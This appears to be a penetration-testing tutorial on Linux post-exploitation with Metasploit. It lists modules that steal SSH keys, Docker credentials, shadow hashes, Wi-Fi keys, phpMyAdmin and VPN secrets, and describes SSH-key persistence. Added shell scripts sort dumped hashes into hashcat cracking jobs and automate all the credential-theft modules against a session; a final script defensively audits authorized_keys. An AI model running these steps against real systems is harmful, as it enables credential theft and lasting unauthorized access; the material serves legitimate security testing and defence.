Credential Gathering
Once a system is compromised, gathering credentials is crucial for lateral movement and further exploitation.
Extracting SSH Credentials
use post/multi/gather/ssh_creds
set SESSION 1
run
This module collects the contents of each user's .ssh directory, including private keys, known_hosts and authorized_keys. An unencrypted private key, together with the hosts listed in known_hosts (unless HashKnownHosts is in use), often gives direct access to other machines in the network.
Extracting Docker Credentials
use post/multi/gather/docker_creds
set SESSION 1
run
This module retrieves registry credentials from each user's ~/.docker/config.json. The auths entries there are only base64-encoded user:password pairs, not encrypted, so they can be reused as-is against private registries and the images and services built from them.
Dumping Linux Password Hashes
use post/linux/gather/hashdump
set SESSION 1
set VERBOSE true
run
Hash dumping requires a root session, since it reads /etc/shadow, and returns unshadowed passwd-style lines (user:hash:uid:gid:...). The hashes can then be cracked offline with tools like Hashcat or John the Ripper.
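The first thing to do with a dump is to sort the hashes by algorithm, because each crypt(3) prefix needs a different cracking mode. The script below is an added example, not code from the original page or from Metasploit: it maps the $id$ prefix of each dumped line to the hashcat -m mode, splits the dump into one file per mode and prints the hashcat command line for each. The sample dump and the wordlist path are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the original page: classify hashes from a
# post/linux/gather/hashdump-style dump (unshadowed passwd lines of the form
# "user:$id$salt$hash:uid:gid:gecos:home:shell") by crypt(3) prefix and
# emit the matching hashcat -m mode. The sample dump below is constructed.

# hash_mode LINE -> hashcat mode number, or none/unsupported/unknown
hash_mode() {
    _hash=$(printf '%s\n' "$1" | cut -d: -f2)
    case "$_hash" in
        ''|'*'|'!'|'!!'|'!*')      echo none ;;        # locked or passwordless account
        '$1$'*)                    echo 500 ;;         # md5crypt
        '$5$'*)                    echo 7400 ;;        # sha256crypt
        '$6$'*)                    echo 1800 ;;        # sha512crypt
        '$2a$'*|'$2b$'*|'$2y$'*)   echo 3200 ;;        # bcrypt
        '$y$'*|'$7$'*)             echo unsupported ;; # yescrypt/scrypt: use john --format=crypt
        *)                         echo unknown ;;
    esac
}

# split_dump DUMPFILE OUTDIR WORDLIST -> writes OUTDIR/mode_<n>.txt as "user:hash"
# for every crackable line and prints one hashcat command per mode found.
split_dump() {
    _dump=$1; _out=$2; _wl=$3
    mkdir -p "$_out"
    while IFS= read -r _line; do
        [ -z "$_line" ] && continue
        _m=$(hash_mode "$_line")
        case "$_m" in none|unsupported|unknown) continue ;; esac
        printf '%s\n' "$_line" | cut -d: -f1,2 >> "$_out/mode_$_m.txt"
    done < "$_dump"
    for _f in "$_out"/mode_*.txt; do
        [ -e "$_f" ] || continue
        _m=${_f##*/mode_}; _m=${_m%.txt}
        # --username tells hashcat to ignore the "user:" prefix on each line
        echo "hashcat -m $_m --username -a 0 $_f $_wl"
    done
}

# Constructed sample dump (not real credentials) so the script runs offline.
SAMPLE_DUMP=$(mktemp)
cat > "$SAMPLE_DUMP" <<'EOF'
root:$6$Ab12Cd34$notarealhashnotarealhashnotarealhashnotarealhash:0:0:root:/root:/bin/bash
legacy:$1$Ab12$notarealhashnotareal:1001:1001::/home/legacy:/bin/sh
svc:$y$j9T$notarealsalt$notarealhash:1002:1002::/var/svc:/usr/sbin/nologin
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
EOF
SAMPLE_OUT=$(mktemp -d)
split_dump "$SAMPLE_DUMP" "$SAMPLE_OUT" /usr/share/wordlists/rockyou.txt
```

Modern distributions increasingly default to yescrypt ($y$), which hashcat does not crack natively; those lines are deliberately left out of the hashcat files so they can be fed to John's crypt format instead.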
Retrieving EcryptFS Credentials
If the target system uses eCryptfs for encrypted home directories, this module collects the wrapped-passphrase files from users' .ecryptfs directories. These do not contain usable keys on their own: the mount passphrase is wrapped with the user's login password, so the file has to be unwrapped or cracked offline (John the Ripper has an eCryptfs format for this).
Enumerating Wireless Pre-Shared Keys
This module lists stored Wi-Fi pre-shared keys. On NetworkManager systems these sit in plaintext in /etc/NetworkManager/system-connections/, readable only by root, so a root session is needed; the keys are useful for pivoting into nearby wireless networks.
Extracting XChat Credentials
Attackers can use this module to extract server credentials and chat logs from the configuration of XChat, an IRC client, in the user's home directory.
Stealing phpMyAdmin Credentials
Many administrators use phpMyAdmin to manage MySQL/MariaDB databases. This module reads the database username and password from phpMyAdmin's configuration file, allowing direct access to the data without going through the web interface.
Retrieving PPTP VPN Secrets
This module collects the PPP credentials stored in plaintext in the pptpd server's chap-secrets file (/etc/ppp/chap-secrets), potentially giving an attacker VPN access, along with passwords that are frequently reused elsewhere.
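Running the modules above one by one against the same session is tedious, and msfconsole can replay them from a resource script instead. The script below is an added example, not code from the original page or from Metasploit: it generates a resource script that runs every gather module from this section against a given session and then lists what was stored. The module paths for the sections that show no command (eCryptfs, wireless PSKs, XChat, phpMyAdmin, pptpd) are the ones in the current Metasploit tree; confirm them with `search <name>` in msfconsole before relying on them.

```shell
#!/bin/sh
# Added example, not code from the original page or from Metasploit:
# emit an msfconsole resource script that runs each credential-gathering
# module from this section against one session. Module paths for the
# sections without a command on the page are taken from the current
# Metasploit tree (check with "search" in msfconsole).

GATHER_MODULES="
post/multi/gather/ssh_creds
post/multi/gather/docker_creds
post/linux/gather/hashdump
post/linux/gather/ecryptfs_creds
post/linux/gather/enum_psk
post/linux/gather/enum_xchat
post/linux/gather/phpmyadmin_credsteal
post/linux/gather/pptpd_chap_secrets
"

# gather_rc SESSION -> prints the resource script to stdout
gather_rc() {
    _sess=$1
    for _mod in $GATHER_MODULES; do
        # same four-line pattern the page uses for each module
        printf 'use %s\nset SESSION %s\nset VERBOSE true\nrun\n' "$_mod" "$_sess"
    done
    # afterwards, list what the modules stored in the database and loot directory
    printf 'loot\ncreds\n'
}

# gather_module_count -> number of modules the generated script runs
gather_module_count() {
    set -- $GATHER_MODULES
    echo $#
}

# Usage: write the script for session 1 and replay it:
#   msfconsole -q -r "$GATHER_RC"
GATHER_RC=$(mktemp)
gather_rc "${1:-1}" > "$GATHER_RC"
```

Modules that need root (hashdump, enum_psk) simply report failure on an unprivileged session, so the script is safe to run before and again after privilege escalation.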
Persistence
Maintaining access ensures an attacker can return to a compromised system even after a reboot, a password change, or a security patch that closes the original entry point.
SSH Key Persistence
This module adds an attacker-controlled public key to the authorized_keys file of one or all users, generating a key pair and storing the private key in Metasploit's loot, so the attacker can log in over SSH even if passwords are changed. It relies on the target's sshd accepting public-key authentication for the chosen user.
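The defender's counterpart to this module is a check of authorized_keys against a known-good list, since an injected key looks exactly like a legitimate one. The script below is an added example, not code from the original page or from Metasploit: it parses each authorized_keys entry (options, key type, blob, comment), flags any key whose blob is not in an allowlist, and returns non-zero if anything unexpected is found. The sample files are constructed and contain no real keys.

```shell
#!/bin/sh
# Added example (defensive check), not code from the original page or from
# Metasploit: flag authorized_keys entries whose key blob is not in an
# allowlist of approved blobs. Sample files below are constructed.

# audit_authorized_keys AUTHORIZED_KEYS ALLOWLIST
#   prints "UNKNOWN: <line>" for every key not in ALLOWLIST (one blob per line)
#   and "UNPARSED: <line>" for lines it cannot parse; returns 1 if any found.
audit_authorized_keys() {
    _ak=$1; _allow=$2; _found=0
    while IFS= read -r _line; do
        case "$_line" in ''|'#'*) continue ;; esac
        # Line format: [options] keytype base64blob [comment]. The blob is the
        # field right after the key type; options (if any) come first. Options
        # containing embedded spaces are not handled by this simple split.
        _blob=$(printf '%s\n' "$_line" | awk '{
            for (i = 1; i <= NF; i++)
                if ($i ~ /^(ssh-rsa|ssh-ed25519|ssh-dss|ecdsa-sha2-nistp[0-9]+|sk-)/) {
                    print $(i+1); exit
                }
        }')
        if [ -z "$_blob" ]; then
            echo "UNPARSED: $_line"; _found=1; continue
        fi
        if ! grep -qxF -- "$_blob" "$_allow"; then
            echo "UNKNOWN: $_line"; _found=1
        fi
    done < "$_ak"
    return $_found
}

# Constructed sample allowlist: the blob of the one key that should be present.
SAMPLE_ALLOW=$(mktemp)
cat > "$SAMPLE_ALLOW" <<'EOF'
AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKnownKeyBlob0000000000000000
EOF

# Constructed sample authorized_keys with one approved key and one injected key
# carrying forced-command options, as an attacker might add it.
SAMPLE_AK=$(mktemp)
cat > "$SAMPLE_AK" <<'EOF'
# ops bastion key (constructed sample, not a real key)
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKnownKeyBlob0000000000000000 ops@bastion
command="/bin/sh",no-pty ssh-rsa AAAAB3NzaC1yc2EConstructedUnknownBlob1111111111111111 unknown@nowhere
EOF

# Constructed clean file: only the approved key.
SAMPLE_CLEAN=$(mktemp)
head -n 2 "$SAMPLE_AK" > "$SAMPLE_CLEAN"

audit_authorized_keys "$SAMPLE_AK" "$SAMPLE_ALLOW" || echo "unexpected keys present"
```

In practice the allowlist is built from the keys your provisioning system deploys, and the check is run against every user's authorized_keys file (plus any AuthorizedKeysFile paths set in sshd_config), ideally from a file-integrity or configuration-management job rather than by hand.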